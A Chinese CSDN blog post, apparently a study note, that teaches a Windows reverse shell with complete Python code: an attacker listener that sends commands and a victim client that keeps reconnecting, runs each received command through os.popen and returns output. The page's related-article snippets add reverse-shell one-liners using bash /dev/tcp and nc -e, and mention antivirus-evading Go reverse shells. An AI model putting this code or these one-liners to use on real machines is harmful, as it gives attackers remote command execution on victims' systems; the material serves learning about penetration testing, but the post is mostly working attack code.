Windows下的反弹shell

最新推荐文章于 2024-06-17 13:19:21 发布
最新推荐文章于 2024-06-17 13:19:21 发布
阅读量8.3k 收藏 9
点赞数 1
文章标签: Windows shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43871760/article/details/88574127
版权

今天学习内容就是反弹shell啦~~
当服务器端攻击客户端时,此时客户端IP地址未知,所以要使用反向shell
在这里分别写服务器端代码和客户端代码;注:每次运行时要先开服务器端
服务器端(攻击者,导入模块:import socket)
基本步骤:
1、创建套接字

s=socket.socket()

2、进行绑定(ip:允许连接的ip,服务器端端口)

s.bind(("0.0.0.0",6666))

3、允许连入的主机数

s.listen()

4、创建接口与连入的主机地址

con,addr=s.accept()

具体代码:

import socket

s = socket.socket()
s.bind(('0.0.0.0',6666))
s.listen(5)
con,addr = s.accept()
print(addr)

for i in range(3):
    cmd = input('第%d条命令:'%(i+1))
    con.send(cmd.encode())
    result = con.recv(65536)
    print(result.decode())
con.close()

客户端(被攻击者,导入模块:import socket,import os)
基本步骤:
1、创建套接字,连接服务器(ip:服务器端,端口:服务器端)

s=socket.socket()
s.connect(('127.0.0.1',6666))

2、收发数据

cmd = s.recv(1024).decode()
s.send(result.encode())

3、关闭套接字

s.close()

具体代码:

import os
import time
import socket

s = socket.socket()


while 1:
    try:
        s.connect(('127.0.0.1',6666))
        break
    except:
        time.sleep(5)
        
for i in range(3):
    cmd = s.recv(1024).decode()
    print('收到的第%d条命令'%(i+1),cmd)
    result = os.popen(cmd).read()
    if result:
        s.send(result.encode())
    else:
        if cmd[:2] == 'cd':
            os.chdir(cmd[2:].strip())
        s.send(b'OK!')
        
s.close()

实现效果图:
客户端:
在这里插入图片描述
服务器端:
在这里插入图片描述
enen~~就酱紫

ST小姐姐
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd反弹shell提权
10-24
cmd反弹shell提权
渗透测试-window反弹shell
lza20001103的博客
05-11 4443
window反弹shell
windows反弹shell的方法
最新发布
极客云曦前端
06-17 296
在这个例子中,攻击者的IP地址是192.168.1.17,端口是7777。首先说,正向shell是控制端主动连接被控制端,通过目标主机开放一个监听端口等待其他主机访问,从而获得对目标主机的shell访问,优点是控制端可以整个控制目标主机,但缺点会受到防火墙的连,等网络安全的限制。反向shell则是目标机器主动连接到攻击者的机器,通过在目标机器上执行操作访问攻击者的电脑建立的shell。简而言之,正向shell是攻击者主动出击,而反向shell则是目标机器主动反击,两者在网络环境的要求和安全性上有所不同。
Windows 反弹shell方法
weixin_53747497的博客
07-12 2765
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
python shell反弹shell
WY92139010的博客
03-04 276
python shell反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端,被攻击端是服务端 反弹shell,先启用服务端,再启用客户端 反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行) shell: 客户端:  ...
反弹shell命令
Shanfenglan's blog
10-29 2669
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
详解NC反弹shell的几种方法
01-08
正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1...
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
cmd 返回值_渗透不会反弹shell?来教你写一个cmd的shell
weixin_39756235的博客
11-20 113
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
渗透不会反弹shell?来教你写一个cmd的shell
蚁景网安学院
02-20 354
渗透不会反弹shell?来教你写一个cmd的shell包含的库:#include <winsock2.h> #include <windows.h> #inclu...
反弹cmd
qq_41861225的博客
01-21 1167
**前言:**我们在学习的过程中经常会听见“反弹shell”一词,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。同理我们也可以自己实现一套反弹cmd的操作。 ...
反弹shell
stonesharp的专栏
04-03 3377
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
CreateProcess 重定向CMD实现反弹shell
hambaga的博客
03-01 431
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。 // RedirectCmd.cpp : Defines the entry point for the console application. // 还原《恶意代码分析实战》第九章练习样本2 #include "stdafx.h" #include <WinSock2.h> #include <Windows.h> #pragma comment(l
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6131
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmd的shell
weixin_39942474的博客
05-22 748
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
windows 反弹shell
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值